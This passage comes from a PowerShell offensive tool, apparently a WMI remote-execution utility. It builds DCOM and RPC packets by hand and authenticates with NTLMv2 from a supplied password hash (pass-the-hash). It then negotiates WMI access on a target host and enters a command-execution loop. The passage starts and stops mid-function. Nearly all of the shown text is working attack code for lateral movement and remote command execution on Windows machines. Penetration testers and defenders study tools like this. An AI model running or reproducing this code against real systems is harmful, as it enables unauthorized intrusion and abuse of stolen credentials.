$packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoRemoteRequestPtrRemoteRequestUnknown",[Byte[]](0x00,0x00)) 464 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoRemoteRequestPtrRemoteRequestProtocolSeqsArrayPtrReferentID",[Byte[]](0x04,0x00,0x02,0x00)) 465 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoRemoteRequestPtrRemoteRequestProtocolSeqsArrayPtrMaxCount",[Byte[]](0x01,0x00,0x00,0x00)) 466 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoRemoteRequestPtrRemoteRequestProtocolSeqsArrayPtrProtocolSeq",[Byte[]](0x07,0x00)) 467 | $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoUnusedBuffer",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00)) 468 | 469 | return $packet_DCOMRemoteCreateInstance 470 | } 471 | 472 | function Get-UInt16DataLength 473 | { 474 | param ([Int]$Start,[Byte[]]$Data) 475 | 476 | $data_length = [System.BitConverter]::ToUInt16($Data[$Start..($Start + 1)],0) 477 | 478 | return $data_length 479 | } 480 | 481 | if($hash -like "*:*") 482 | { 483 | $hash = $hash.SubString(($hash.IndexOf(":") + 1),32) 484 | } 485 | 486 | if($Domain) 487 | { 488 | $output_username = $Domain + "\" + $Username 489 | } 490 | else 491 | { 492 | $output_username = $Username 493 | } 494 | 495 | if($Target -eq 'localhost') 496 | { 497 | $Target = "127.0.0.1" 498 | } 499 | 500 | try 501 | { 502 | $target_type = [IPAddress]$Target 503 | $target_short = $target_long = $Target 504 | } 505 | catch 506 | { 507 | $target_long = $Target 508 | 509 | if($Target -like "*.*") 510 | { 511 | $target_short_index = $Target.IndexOf(".") 512 | $target_short = $Target.Substring(0,$target_short_index) 513 | } 514 | else 515 | { 516 | $target_short = $Target 517 | } 518 | 519 | } 520 | 521 | $process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id 522 | $process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID)) 523 | $process_ID = $process_ID -replace "-00-00","" 524 | [Byte[]]$process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} 525 | Write-Verbose "Connecting to $Target`:135" 526 | $WMI_client_init = New-Object System.Net.Sockets.TCPClient 527 | $WMI_client_init.Client.ReceiveTimeout = 30000 528 | 529 | try 530 | { 531 | $WMI_client_init.Connect($Target,"135") 532 | } 533 | catch 534 | { 535 | Write-Output "[-] $Target did not respond" 536 | } 537 | 538 | if($WMI_client_init.Connected) 539 | { 540 | $WMI_client_stream_init = $WMI_client_init.GetStream() 541 | $WMI_client_receive = New-Object System.Byte[] 2048 542 | $RPC_UUID = 0xc4,0xfe,0xfc,0x99,0x60,0x52,0x1b,0x10,0xbb,0xcb,0x00,0xaa,0x00,0x21,0x34,0x7a 543 | $packet_RPC = New-PacketRPCBind 2 0xd0,0x16 0x02 0x00,0x00 $RPC_UUID 0x00,0x00 544 | $packet_RPC["FragLength"] = 0x74,0x00 545 | $RPC = ConvertFrom-PacketOrderedDictionary $packet_RPC 546 | $WMI_client_send = $RPC 547 | $WMI_client_stream_init.Write($WMI_client_send,0,$WMI_client_send.Length) > $null 548 | $WMI_client_stream_init.Flush() 549 | $WMI_client_stream_init.Read($WMI_client_receive,0,$WMI_client_receive.Length) > $null 550 | $assoc_group = $WMI_client_receive[20..23] 551 | $packet_RPC = New-PacketRPCRequest 0x03 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x05,0x00 552 | $RPC = ConvertFrom-PacketOrderedDictionary $packet_RPC 553 | $WMI_client_send = $RPC 554 | $WMI_client_stream_init.Write($WMI_client_send,0,$WMI_client_send.Length) > $null 555 | $WMI_client_stream_init.Flush() 556 | $WMI_client_stream_init.Read($WMI_client_receive,0,$WMI_client_receive.Length) > $null 557 | $WMI_hostname_unicode = $WMI_client_receive[42..$WMI_client_receive.Length] 558 | $WMI_hostname = [System.BitConverter]::ToString($WMI_hostname_unicode) 559 | $WMI_hostname_index = $WMI_hostname.IndexOf("-00-00-00") 560 | $WMI_hostname = $WMI_hostname.SubString(0,$WMI_hostname_index) 561 | $WMI_hostname = $WMI_hostname -replace "-00","" 562 | $WMI_hostname = $WMI_hostname.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} 563 | $WMI_hostname = New-Object System.String ($WMI_hostname,0,$WMI_hostname.Length) 564 | 565 | if($target_short -cne $WMI_hostname) 566 | { 567 | Write-Verbose "WMI reports target hostname as $WMI_hostname" 568 | $target_short = $WMI_hostname 569 | } 570 | 571 | $WMI_client_init.Close() 572 | $WMI_client_stream_init.Close() 573 | $WMI_client = New-Object System.Net.Sockets.TCPClient 574 | $WMI_client.Client.ReceiveTimeout = 30000 575 | 576 | try 577 | { 578 | $WMI_client.Connect($target_long,"135") 579 | } 580 | catch 581 | { 582 | Write-Output "[-] $target_long did not respond" 583 | } 584 | 585 | if($WMI_client.Connected) 586 | { 587 | $WMI_client_stream = $WMI_client.GetStream() 588 | $RPC_UUID = 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 589 | $packet_RPC = New-PacketRPCBind 3 0xd0,0x16 0x01 0x01,0x00 $RPC_UUID 0x00,0x00 590 | $packet_RPC["FragLength"] = 0x78,0x00 591 | $packet_RPC["AuthLength"] = 0x28,0x00 592 | $packet_RPC["NegotiateFlags"] = 0x07,0x82,0x08,0xa2 593 | $RPC = ConvertFrom-PacketOrderedDictionary $packet_RPC 594 | $WMI_client_send = $RPC 595 | $WMI_client_stream.Write($WMI_client_send,0,$WMI_client_send.Length) > $null 596 | $WMI_client_stream.Flush() 597 | $WMI_client_stream.Read($WMI_client_receive,0,$WMI_client_receive.Length) > $null 598 | $assoc_group = $WMI_client_receive[20..23] 599 | $WMI_NTLMSSP = [System.BitConverter]::ToString($WMI_client_receive) 600 | $WMI_NTLMSSP = $WMI_NTLMSSP -replace "-","" 601 | $WMI_NTLMSSP_index = $WMI_NTLMSSP.IndexOf("4E544C4D53535000") 602 | $WMI_NTLMSSP_bytes_index = $WMI_NTLMSSP_index / 2 603 | $WMI_domain_length = Get-UInt16DataLength ($WMI_NTLMSSP_bytes_index + 12) $WMI_client_receive 604 | $WMI_target_length = Get-UInt16DataLength ($WMI_NTLMSSP_bytes_index + 40) $WMI_client_receive 605 | $WMI_session_ID = $WMI_client_receive[44..51] 606 | $WMI_NTLM_challenge = $WMI_client_receive[($WMI_NTLMSSP_bytes_index + 24)..($WMI_NTLMSSP_bytes_index + 31)] 607 | $WMI_target_details = $WMI_client_receive[($WMI_NTLMSSP_bytes_index + 56 + $WMI_domain_length)..($WMI_NTLMSSP_bytes_index + 55 + $WMI_domain_length + $WMI_target_length)] 608 | $WMI_target_time_bytes = $WMI_target_details[($WMI_target_details.Length - 12)..($WMI_target_details.Length - 5)] 609 | $NTLM_hash_bytes = (&{for ($i = 0;$i -lt $hash.Length;$i += 2){$hash.SubString($i,2)}}) -join "-" 610 | $NTLM_hash_bytes = $NTLM_hash_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} 611 | $auth_hostname = (get-childitem -path env:computername).Value 612 | $auth_hostname_bytes = [System.Text.Encoding]::Unicode.GetBytes($auth_hostname) 613 | $auth_domain = $Domain 614 | $auth_domain_bytes = [System.Text.Encoding]::Unicode.GetBytes($auth_domain) 615 | $auth_username_bytes = [System.Text.Encoding]::Unicode.GetBytes($username) 616 | $auth_domain_length = [System.BitConverter]::GetBytes($auth_domain_bytes.Length)[0,1] 617 | $auth_domain_length = [System.BitConverter]::GetBytes($auth_domain_bytes.Length)[0,1] 618 | $auth_username_length = [System.BitConverter]::GetBytes($auth_username_bytes.Length)[0,1] 619 | $auth_hostname_length = [System.BitConverter]::GetBytes($auth_hostname_bytes.Length)[0,1] 620 | $auth_domain_offset = 0x40,0x00,0x00,0x00 621 | $auth_username_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + 64) 622 | $auth_hostname_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + 64) 623 | $auth_LM_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + $auth_hostname_bytes.Length + 64) 624 | $auth_NTLM_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + $auth_hostname_bytes.Length + 88) 625 | $HMAC_MD5 = New-Object System.Security.Cryptography.HMACMD5 626 | $HMAC_MD5.key = $NTLM_hash_bytes 627 | $username_and_target = $username.ToUpper() 628 | $username_and_target_bytes = [System.Text.Encoding]::Unicode.GetBytes($username_and_target) 629 | $username_and_target_bytes += $auth_domain_bytes 630 | $NTLMv2_hash = $HMAC_MD5.ComputeHash($username_and_target_bytes) 631 | $client_challenge = [String](1..8 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) 632 | $client_challenge_bytes = $client_challenge.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} 633 | 634 | $security_blob_bytes = 0x01,0x01,0x00,0x00, 635 | 0x00,0x00,0x00,0x00 + 636 | $WMI_target_time_bytes + 637 | $client_challenge_bytes + 638 | 0x00,0x00,0x00,0x00 + 639 | $WMI_target_details + 640 | 0x00,0x00,0x00,0x00, 641 | 0x00,0x00,0x00,0x00 642 | 643 | $server_challenge_and_security_blob_bytes = $WMI_NTLM_challenge + $security_blob_bytes 644 | $HMAC_MD5.key = $NTLMv2_hash 645 | $NTLMv2_response = $HMAC_MD5.ComputeHash($server_challenge_and_security_blob_bytes) 646 | $session_base_key = $HMAC_MD5.ComputeHash($NTLMv2_response) 647 | $NTLMv2_response = $NTLMv2_response + $security_blob_bytes 648 | $NTLMv2_response_length = [System.BitConverter]::GetBytes($NTLMv2_response.Length)[0,1] 649 | $WMI_session_key_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + $auth_hostname_bytes.Length + $NTLMv2_response.Length + 88) 650 | $WMI_session_key_length = 0x00,0x00 651 | $WMI_negotiate_flags = 0x15,0x82,0x88,0xa2 652 | 653 | $NTLMSSP_response = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00, 654 | 0x03,0x00,0x00,0x00, 655 | 0x18,0x00, 656 | 0x18,0x00 + 657 | $auth_LM_offset + 658 | $NTLMv2_response_length + 659 | $NTLMv2_response_length + 660 | $auth_NTLM_offset + 661 | $auth_domain_length + 662 | $auth_domain_length + 663 | $auth_domain_offset + 664 | $auth_username_length + 665 | $auth_username_length + 666 | $auth_username_offset + 667 | $auth_hostname_length + 668 | $auth_hostname_length + 669 | $auth_hostname_offset + 670 | $WMI_session_key_length + 671 | $WMI_session_key_length + 672 | $WMI_session_key_offset + 673 | $WMI_negotiate_flags + 674 | $auth_domain_bytes + 675 | $auth_username_bytes + 676 | $auth_hostname_bytes + 677 | 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 678 | 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 + 679 | $NTLMv2_response 680 | 681 | $assoc_group = $WMI_client_receive[20..23] 682 | $packet_RPC = New-PacketRPCAUTH3 $NTLMSSP_response 683 | $RPC = ConvertFrom-PacketOrderedDictionary $packet_RPC 684 | $WMI_client_send = $RPC 685 | $WMI_client_stream.Write($WMI_client_send,0,$WMI_client_send.Length) > $null 686 | $WMI_client_stream.Flush() 687 | $causality_ID = [String](1..16 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) 688 | [Byte[]]$causality_ID_bytes = $causality_ID.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} 689 | $unused_buffer = [String](1..16 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) 690 | [Byte[]]$unused_buffer_bytes = $unused_buffer.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} 691 | $packet_DCOM_remote_create_instance = New-PacketDCOMRemoteCreateInstance $causality_ID_bytes $target_short 692 | $DCOM_remote_create_instance = ConvertFrom-PacketOrderedDictionary $packet_DCOM_remote_create_instance 693 | $packet_RPC = New-PacketRPCRequest 0x03 $DCOM_remote_create_instance.Length 0 0 0x03,0x00,0x00,0x00 0x01,0x00 0x04,0x00 694 | $RPC = ConvertFrom-PacketOrderedDictionary $packet_RPC 695 | $WMI_client_send = $RPC + $DCOM_remote_create_instance 696 | $WMI_client_stream.Write($WMI_client_send,0,$WMI_client_send.Length) > $null 697 | $WMI_client_stream.Flush() 698 | $WMI_client_stream.Read($WMI_client_receive,0,$WMI_client_receive.Length) > $null 699 | 700 | if($WMI_client_receive[2] -eq 3 -and [System.BitConverter]::ToString($WMI_client_receive[24..27]) -eq '05-00-00-00') 701 | { 702 | Write-Output "[-] $output_username WMI access denied on $target_long" 703 | } 704 | elseif($WMI_client_receive[2] -eq 3) 705 | { 706 | $error_code = [System.BitConverter]::ToString($WMI_client_receive[27..24]) 707 | $error_code = $error_code -replace "-","" 708 | Write-Output "[-] Error code 0x$error_code" 709 | } 710 | elseif($WMI_client_receive[2] -eq 2 -and !$WMI_execute) 711 | { 712 | Write-Output "[+] $output_username accessed WMI on $target_long" 713 | } 714 | elseif($WMI_client_receive[2] -eq 2) 715 | { 716 | 717 | Write-Verbose "[+] $output_username accessed WMI on $target_long" 718 | 719 | if($target_short -eq '127.0.0.1') 720 | { 721 | $target_short = $auth_hostname 722 | } 723 | 724 | $target_unicode = 0x07,0x00 + [System.Text.Encoding]::Unicode.GetBytes($target_short + "[") 725 | $target_search = [System.BitConverter]::ToString($target_unicode) 726 | $target_search = $target_search -replace "-","" 727 | $WMI_message = [System.BitConverter]::ToString($WMI_client_receive) 728 | $WMI_message = $WMI_message -replace "-","" 729 | $target_index = $WMI_message.IndexOf($target_search) 730 | 731 | if($target_index -lt 1) 732 | { 733 | $target_address_list = [System.Net.Dns]::GetHostEntry($target_long).AddressList 734 | 735 | ForEach($IP_address in $target_address_list) 736 | { 737 | $target_short = $IP_address.IPAddressToString 738 | $target_unicode = 0x07,0x00 + [System.Text.Encoding]::Unicode.GetBytes($target_short + "[") 739 | $target_search = [System.BitConverter]::ToString($target_unicode) 740 | $target_search = $target_search -replace "-","" 741 | $target_index = $WMI_message.IndexOf($target_search) 742 | 743 | if($target_index -gt 0) 744 | { 745 | break 746 | } 747 | 748 | } 749 | 750 | } 751 | 752 | if($target_long -cne $target_short) 753 | { 754 | Write-Verbose "[*] Using $target_short for random port extraction" 755 | } 756 | 757 | if($target_index -gt 0) 758 | { 759 | $target_bytes_index = $target_index / 2 760 | $WMI_random_port = $WMI_client_receive[($target_bytes_index + $target_unicode.Length)..($target_bytes_index + $target_unicode.Length + 8)] 761 | $WMI_random_port = [System.BitConverter]::ToString($WMI_random_port) 762 | $WMI_random_port_end_index = $WMI_random_port.IndexOf("-5D") 763 | 764 | if($WMI_random_port_end_index -gt 0) 765 | { 766 | $WMI_random_port = $WMI_random_port.SubString(0,$WMI_random_port_end_index) 767 | } 768 | 769 | $WMI_random_port = $WMI_random_port -replace "-00","" 770 | $WMI_random_port = $WMI_random_port.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} 771 | [Int]$WMI_random_port_int = -join $WMI_random_port 772 | $MEOW = [System.BitConverter]::ToString($WMI_client_receive) 773 | $MEOW = $MEOW -replace "-","" 774 | $MEOW_index = $MEOW.IndexOf("4D454F570100000018AD09F36AD8D011A07500C04FB68820") 775 | $MEOW_bytes_index = $MEOW_index / 2 776 | $OXID = $WMI_client_receive[($MEOW_bytes_index + 32)..($MEOW_bytes_index + 39)] 777 | $IPID = $WMI_client_receive[($MEOW_bytes_index + 48)..($MEOW_bytes_index + 63)] 778 | $OXID = [System.BitConverter]::ToString($OXID) 779 | $OXID = $OXID -replace "-","" 780 | $OXID_index = $MEOW.IndexOf($OXID,$MEOW_index + 100) 781 | $OXID_bytes_index = $OXID_index / 2 782 | $object_UUID = $WMI_client_receive[($OXID_bytes_index + 12)..($OXID_bytes_index + 27)] 783 | $WMI_client_random_port = New-Object System.Net.Sockets.TCPClient 784 | $WMI_client_random_port.Client.ReceiveTimeout = 30000 785 | } 786 | 787 | if($WMI_random_port) 788 | { 789 | 790 | Write-Verbose "[*] Connecting to $target_long`:$WMI_random_port_int" 791 | 792 | try 793 | { 794 | $WMI_client_random_port.Connect($target_long,$WMI_random_port_int) 795 | } 796 | catch 797 | { 798 | Write-Output "[-] $target_long`:$WMI_random_port_int did not respond" 799 | } 800 | 801 | } 802 | else 803 | { 804 | Write-Output "[-] Random port extraction failure" 805 | } 806 | 807 | } 808 | else 809 | { 810 | Write-Output "[-] Something went wrong" 811 | } 812 | 813 | if($WMI_client_random_port.Connected) 814 | { 815 | $WMI_client_random_port_stream = $WMI_client_random_port.GetStream() 816 | $packet_RPC = New-PacketRPCBind 2 0xd0,0x16 0x03 0x00,0x00 0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 0x00,0x00 817 | $packet_RPC["FragLength"] = 0xd0,0x00 818 | $packet_RPC["AuthLength"] = 0x28,0x00 819 | $packet_RPC["AuthLevel"] = 0x04 820 | $packet_RPC["NegotiateFlags"] = 0x97,0x82,0x08,0xa2 821 | $RPC = ConvertFrom-PacketOrderedDictionary $packet_RPC 822 | $WMI_client_send = $RPC 823 | $WMI_client_random_port_stream.Write($WMI_client_send,0,$WMI_client_send.Length) > $null 824 | $WMI_client_random_port_stream.Flush() 825 | $WMI_client_random_port_stream.Read($WMI_client_receive,0,$WMI_client_receive.Length) > $null 826 | $assoc_group = $WMI_client_receive[20..23] 827 | $WMI_NTLMSSP = [System.BitConverter]::ToString($WMI_client_receive) 828 | $WMI_NTLMSSP = $WMI_NTLMSSP -replace "-","" 829 | $WMI_NTLMSSP_index = $WMI_NTLMSSP.IndexOf("4E544C4D53535000") 830 | $WMI_NTLMSSP_bytes_index = $WMI_NTLMSSP_index / 2 831 | $WMI_domain_length = Get-UInt16DataLength ($WMI_NTLMSSP_bytes_index + 12) $WMI_client_receive 832 | $WMI_target_length = Get-UInt16DataLength ($WMI_NTLMSSP_bytes_index + 40) $WMI_client_receive 833 | $WMI_session_ID = $WMI_client_receive[44..51] 834 | $WMI_NTLM_challenge = $WMI_client_receive[($WMI_NTLMSSP_bytes_index + 24)..($WMI_NTLMSSP_bytes_index + 31)] 835 | $WMI_target_details = $WMI_client_receive[($WMI_NTLMSSP_bytes_index + 56 + $WMI_domain_length)..($WMI_NTLMSSP_bytes_index + 55 + $WMI_domain_length + $WMI_target_length)] 836 | $WMI_target_time_bytes = $WMI_target_details[($WMI_target_details.Length - 12)..($WMI_target_details.Length - 5)] 837 | $NTLM_hash_bytes = (&{for ($i = 0;$i -lt $hash.Length;$i += 2){$hash.SubString($i,2)}}) -join "-" 838 | $NTLM_hash_bytes = $NTLM_hash_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} 839 | $auth_hostname = (Get-ChildItem -path env:computername).Value 840 | $auth_hostname_bytes = [System.Text.Encoding]::Unicode.GetBytes($auth_hostname) 841 | $auth_domain = $Domain 842 | $auth_domain_bytes = [System.Text.Encoding]::Unicode.GetBytes($auth_domain) 843 | $auth_username_bytes = [System.Text.Encoding]::Unicode.GetBytes($username) 844 | $auth_domain_length = [System.BitConverter]::GetBytes($auth_domain_bytes.Length)[0,1] 845 | $auth_domain_length = [System.BitConverter]::GetBytes($auth_domain_bytes.Length)[0,1] 846 | $auth_username_length = [System.BitConverter]::GetBytes($auth_username_bytes.Length)[0,1] 847 | $auth_hostname_length = [System.BitConverter]::GetBytes($auth_hostname_bytes.Length)[0,1] 848 | $auth_domain_offset = 0x40,0x00,0x00,0x00 849 | $auth_username_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + 64) 850 | $auth_hostname_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + 64) 851 | $auth_LM_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + $auth_hostname_bytes.Length + 64) 852 | $auth_NTLM_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + $auth_hostname_bytes.Length + 88) 853 | $HMAC_MD5 = New-Object System.Security.Cryptography.HMACMD5 854 | $HMAC_MD5.key = $NTLM_hash_bytes 855 | $username_and_target = $username.ToUpper() 856 | $username_and_target_bytes = [System.Text.Encoding]::Unicode.GetBytes($username_and_target) 857 | $username_and_target_bytes += $auth_domain_bytes 858 | $NTLMv2_hash = $HMAC_MD5.ComputeHash($username_and_target_bytes) 859 | $client_challenge = [String](1..8 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) 860 | $client_challenge_bytes = $client_challenge.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} 861 | 862 | $security_blob_bytes = 0x01,0x01,0x00,0x00, 863 | 0x00,0x00,0x00,0x00 + 864 | $WMI_target_time_bytes + 865 | $client_challenge_bytes + 866 | 0x00,0x00,0x00,0x00 + 867 | $WMI_target_details + 868 | 0x00,0x00,0x00,0x00, 869 | 0x00,0x00,0x00,0x00 870 | 871 | $server_challenge_and_security_blob_bytes = $WMI_NTLM_challenge + $security_blob_bytes 872 | $HMAC_MD5.key = $NTLMv2_hash 873 | $NTLMv2_response = $HMAC_MD5.ComputeHash($server_challenge_and_security_blob_bytes) 874 | $session_base_key = $HMAC_MD5.ComputeHash($NTLMv2_response) 875 | 876 | $client_signing_constant = 0x73,0x65,0x73,0x73,0x69,0x6f,0x6e,0x20,0x6b,0x65,0x79,0x20,0x74,0x6f,0x20, 877 | 0x63,0x6c,0x69,0x65,0x6e,0x74,0x2d,0x74,0x6f,0x2d,0x73,0x65,0x72,0x76, 878 | 0x65,0x72,0x20,0x73,0x69,0x67,0x6e,0x69,0x6e,0x67,0x20,0x6b,0x65,0x79, 879 | 0x20,0x6d,0x61,0x67,0x69,0x63,0x20,0x63,0x6f,0x6e,0x73,0x74,0x61,0x6e, 880 | 0x74,0x00 881 | 882 | $MD5 = New-Object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider 883 | $client_signing_key = $MD5.ComputeHash($session_base_key + $client_signing_constant) 884 | $NTLMv2_response = $NTLMv2_response + $security_blob_bytes 885 | $NTLMv2_response_length = [System.BitConverter]::GetBytes($NTLMv2_response.Length)[0,1] 886 | $WMI_session_key_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + $auth_hostname_bytes.Length + $NTLMv2_response.Length + 88) 887 | $WMI_session_key_length = 0x00,0x00 888 | $WMI_negotiate_flags = 0x15,0x82,0x88,0xa2 889 | 890 | $NTLMSSP_response = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00, 891 | 0x03,0x00,0x00,0x00, 892 | 0x18,0x00, 893 | 0x18,0x00 + 894 | $auth_LM_offset + 895 | $NTLMv2_response_length + 896 | $NTLMv2_response_length + 897 | $auth_NTLM_offset + 898 | $auth_domain_length + 899 | $auth_domain_length + 900 | $auth_domain_offset + 901 | $auth_username_length + 902 | $auth_username_length + 903 | $auth_username_offset + 904 | $auth_hostname_length + 905 | $auth_hostname_length + 906 | $auth_hostname_offset + 907 | $WMI_session_key_length + 908 | $WMI_session_key_length + 909 | $WMI_session_key_offset + 910 | $WMI_negotiate_flags + 911 | $auth_domain_bytes + 912 | $auth_username_bytes + 913 | $auth_hostname_bytes + 914 | 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 915 | 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 916 | 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 + 917 | $NTLMv2_response 918 | 919 | $HMAC_MD5.key = $client_signing_key 920 | [Byte[]]$sequence_number = 0x00,0x00,0x00,0x00 921 | $packet_RPC = New-PacketRPCAUTH3 $NTLMSSP_response 922 | $packet_RPC["CallID"] = 0x02,0x00,0x00,0x00 923 | $packet_RPC["AuthLevel"] = 0x04 924 | $RPC = ConvertFrom-PacketOrderedDictionary $packet_RPC 925 | $WMI_client_send = $RPC 926 | $WMI_client_random_port_stream.Write($WMI_client_send,0,$WMI_client_send.Length) > $null 927 | $WMI_client_random_port_stream.Flush() 928 | $packet_RPC = New-PacketRPCRequest 0x83 76 16 4 0x02,0x00,0x00,0x00 0x00,0x00 0x03,0x00 $object_UUID 929 | $packet_rem_query_interface = New-PacketDCOMRemQueryInterface $causality_ID_bytes $IPID 0xd6,0x1c,0x78,0xd4,0xd3,0xe5,0xdf,0x44,0xad,0x94,0x93,0x0e,0xfe,0x48,0xa8,0x87 930 | $packet_NTLMSSP_verifier = New-PacketNTLMSSPVerifier 4 0x04 $sequence_number 931 | $RPC = ConvertFrom-PacketOrderedDictionary $packet_RPC 932 | $rem_query_interface = ConvertFrom-PacketOrderedDictionary $packet_rem_query_interface 933 | $NTLMSSP_verifier = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_verifier 934 | $HMAC_MD5.key = $client_signing_key 935 | $RPC_signature = $HMAC_MD5.ComputeHash($sequence_number + $RPC + $rem_query_interface + $NTLMSSP_verifier[0..11]) 936 | $RPC_signature = $RPC_signature[0..7] 937 | $packet_NTLMSSP_verifier["NTLMSSPVerifierChecksum"] = $RPC_signature 938 | $NTLMSSP_verifier = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_verifier 939 | $WMI_client_send = $RPC + $rem_query_interface + $NTLMSSP_verifier 940 | $WMI_client_random_port_stream.Write($WMI_client_send,0,$WMI_client_send.Length) > $null 941 | $WMI_client_random_port_stream.Flush() 942 | $WMI_client_random_port_stream.Read($WMI_client_receive,0,$WMI_client_receive.Length) > $null 943 | $WMI_client_stage = 'Exit' 944 | 945 | if($WMI_client_receive[2] -eq 3 -and [System.BitConverter]::ToString($WMI_client_receive[24..27]) -eq '05-00-00-00') 946 | { 947 | Write-Output "[-] $output_username WMI access denied on $target_long" 948 | } 949 | elseif($WMI_client_receive[2] -eq 3) 950 | { 951 | $error_code = [System.BitConverter]::ToString($WMI_client_receive[27..24]) 952 | $error_code = $error_code -replace "-","" 953 | Write-Output "[-] Failed with error code 0x$error_code" 954 | } 955 | elseif($WMI_client_receive[2] -eq 2) 956 | { 957 | $WMI_data = [System.BitConverter]::ToString($WMI_client_receive) 958 | $WMI_data = $WMI_data -replace "-","" 959 | $OXID_index = $WMI_data.IndexOf($OXID) 960 | $OXID_bytes_index = $OXID_index / 2 961 | $object_UUID2 = $WMI_client_receive[($OXID_bytes_index + 16)..($OXID_bytes_index + 31)] 962 | $WMI_client_stage = 'AlterContext' 963 | } 964 | else 965 | { 966 | Write-Output "[-] Something went wrong" 967 | } 968 | 969 | Write-Verbose "[*] Attempting command execution" 970 | $request_split_index = 5500 971 | 972 | :WMI_execute_loop while ($WMI_client_stage -ne 'Exit') 973 | { 974 | 975 | if($WMI_client_receive[2] -eq 3) 976 | { 977 | $error_code = [System.BitConverter]::ToString($WMI_client_receive[27..24]) 978 | $error_code = $error_code -replace "-","" 979 | Write-Output "[-] Failed with error code 0x$error_code" 980 | $WMI_client_stage = 'Exit' 981 | } 982 | 983 | switch ($WMI_client_stage) 984 | { 985 | 986 | 'AlterContext' 987 | { 988 | 989 | switch ($sequence_number[0]) 990 | { 991 | 992 | 0 993 | { 994 | $alter_context_call_ID = 0x03,0x00,0x00,0x00 995 | $alter_context_context_ID = 0x02,0x00 996 | $alter_context_UUID = 0xd6,0x1c,0x78,0xd4,0xd3,0xe5,0xdf,0x44,0xad,0x94,0x93,0x0e,0xfe,0x48,0xa8,0x87 997 | $WMI_client_stage_next = 'Request' 998 | } 999 | 1000 | 1 1001 | { 1002 | $alter_context_call_ID = 0x04,0x00,0x00,0x00 1003 | $alter_context_context_ID = 0x03,0x00 1004 | $alter_context_UUID = 0x18,0xad,0x09,0xf3,0x6a,0xd8,0xd0,0x11,0xa0,0x75,0x00,0xc0,0x4f,0xb6,0x88,0x20 1005 | $WMI_client_stage_next = 'Request' 1006 | } 1007 | 1008 | 6 1009 | { 1010 | $alter_context_call_ID = 0x09,0x00,0x00,0x00 1011 | $alter_context_context_ID = 0x04,0x00 1012 | $alter_context_UUID = 0x99,0xdc,0x56,0x95,0x8c,0x82,0xcf,0x11,0xa3,0x7e,0x00,0xaa,0x00,0x32,0x40,0xc7 1013 | $WMI_client_stage_next = 'Request' 1014 | } 1015 | 1016 | } 1017 | 1018 | $packet_RPC = New-PacketRPCAlterContext $assoc_group $alter_context_call_ID $alter_context_context_ID $alter_context_UUID 1019 | $RPC = ConvertFrom-PacketOrderedDictionary $packet_RPC 1020 | $WMI_client_send = $RPC 1021 | $WMI_client_random_port_stream.Write($WMI_client_send,0,$WMI_client_send.Length) > $null 1022 | $WMI_client_random_port_stream.Flush() 1023 | $WMI_client_random_port_stream.Read($WMI_client_receive,0,$WMI_client_receive.Length) > $null 1024 | $WMI_client_stage = $WMI_client_stage_next 1025 | } 1026 | 1027 | 'Request' 1028 | { 1029 | $request_split = $false 1030 | 1031 | switch ($sequence_number[0]) 1032 | { 1033 | 1034 | 0 1035 | { 1036 | $sequence_number = 0x01,0x00,0x00,0x00 1037 